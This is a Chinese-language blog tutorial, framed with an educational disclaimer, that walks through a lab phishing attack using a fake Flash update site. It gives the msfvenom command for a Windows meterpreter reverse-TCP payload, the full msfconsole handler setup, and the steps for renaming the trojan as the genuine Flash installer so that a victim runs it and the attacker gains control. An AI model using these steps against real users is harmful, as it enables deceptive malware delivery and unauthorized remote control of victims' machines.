免责声明
本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。
作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。
在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。
本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。
攻击环境
kali-linux 2024.1(ip:192.168.153.128 作为攻击机)
windows server 2003(ip:192.168.153.40 作为服务器)
windows7(ip:192.168.153.47 作为受害机)
环境搭建
windows server 2003(phpstudy2018版本)
搭建伪造网站将flash网站源码放到phpstudy根目录下
flash网站源码github下载:flash网站源码
攻击步骤
访问搭建的网页
http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html
这样就搭建成功了
打开kali,使用msf生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.153.128 lport=6666 -f exe -o test.exe
其中lhost为本地监听地址也就是kali地址,lport为监听端口,这里需要注意不能和其他端口产生冲突
开启监听模块
msfconsole
选择监听模块
use exploit/multi/handler
设置payload
set payload windows/x64/meterpreter/reverse_tcp
设置监听主机
set lhost 192.168.153.128
设置监听端口
set lport 6666
运行监听模块
exploit
将生成的.exe文件放到windows server 2003的网站路径中,将flash源文件替换,并修改test.exe文件为原文件名称
flash原文件位于:FakeFlash-main\fake_user\fake_flash_domain
原文件为flashcenter_pp_ax_install_cn.exe,我们将他删除并将test.exe文件修改为flashcenter_pp_ax_install_cn.exe
再次访问网站
http://192.168.153.40:90/FakeFlash-main/fake_user/fake_user/index.html
点击立即升级,然后下载该exe文件
下载完成之后我们双击运行
返回kali,我们既可以看到windows7已经被拿下了